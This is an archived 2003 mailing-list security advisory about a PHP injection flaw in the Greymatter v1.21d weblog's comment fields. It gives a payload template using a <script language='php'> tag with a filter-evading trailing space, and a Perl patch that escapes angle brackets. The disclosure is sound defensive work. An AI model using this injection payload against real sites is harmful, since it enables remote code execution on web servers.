Product: Greymatter v1.21d Vendor: Noah Grey - GreySoft Author: FraMe ( frame at kernelpanik.org ) URL: http://www.kernelpanik.org CONTENTS 1. Overview 2. Description. 3. How to exploit it? 4. Impact. 5. Patch. 6. Vendor Response 7. Greetings 1. Overview. Greymatter is a news/weblog tool written in PERL. Greymatter uses html files as backend system. 2. Description. Greymatter v1.21d was released to patch a php injection vulnerability ( http://www.securityfocus.com/bid/7055 ) in comments system. It check if exists tags: "<?" and "?>", but it doesn´t check if exists tags: <script language="php"> or "<%" (asp style: default is off). 3. How to exploit it?. Easy, in name, email or url fields, a user can input for example: <script language="php">PHPCOMMAND;</script > Note: Blank space in </script > is necessary; avoid other checks. 4. Impact If comment file is parsed by PHP produces remote php ejecution, usually with web server privileges. 5. Patch sub gm_htmlspecial { # Convert "<" $IN{'newcommentbody'} =~ s/</\</g; $IN{'newcommentauthor'} =~ s/</\</g; $IN{'newcommentemail'} =~ s/</\</g; $IN{'newcommenthomepage'} =~ s/</\</g; # Convert ">" $IN{'newcommentbody'} =~ s/>/\>/g; $IN{'newcommentauthor'} =~ s/>/\>/g; $IN{'newcommentemail'} =~ s/>/\>/g; $IN{'newcommenthomepage'} =~ s/>/\>/g; } Note: gm-comments.cgi patched can be downloaded from: http://www.kernelpanik.org/code/kernelpanik/gmc.zip 6. Vendor Response 02/07/03: Post in greymatter support forum. Send to bugtraq. 7. Greetings Fermín J. Serna <fjserna at ngsec.com> (aka Zhodiac) ============================== [ FraMe - frame at kernelpanik.org ] [ URL - http://frame.lifefromthenet.com ] [ Kernelpanik - http://www.kernelpanik.org ] [ PGP KeyID - 0xFA81AC9C ] ==============================
This archive was generated by hypermail 2b30 : Wed Jul 02 2003 - 15:19:56 PDT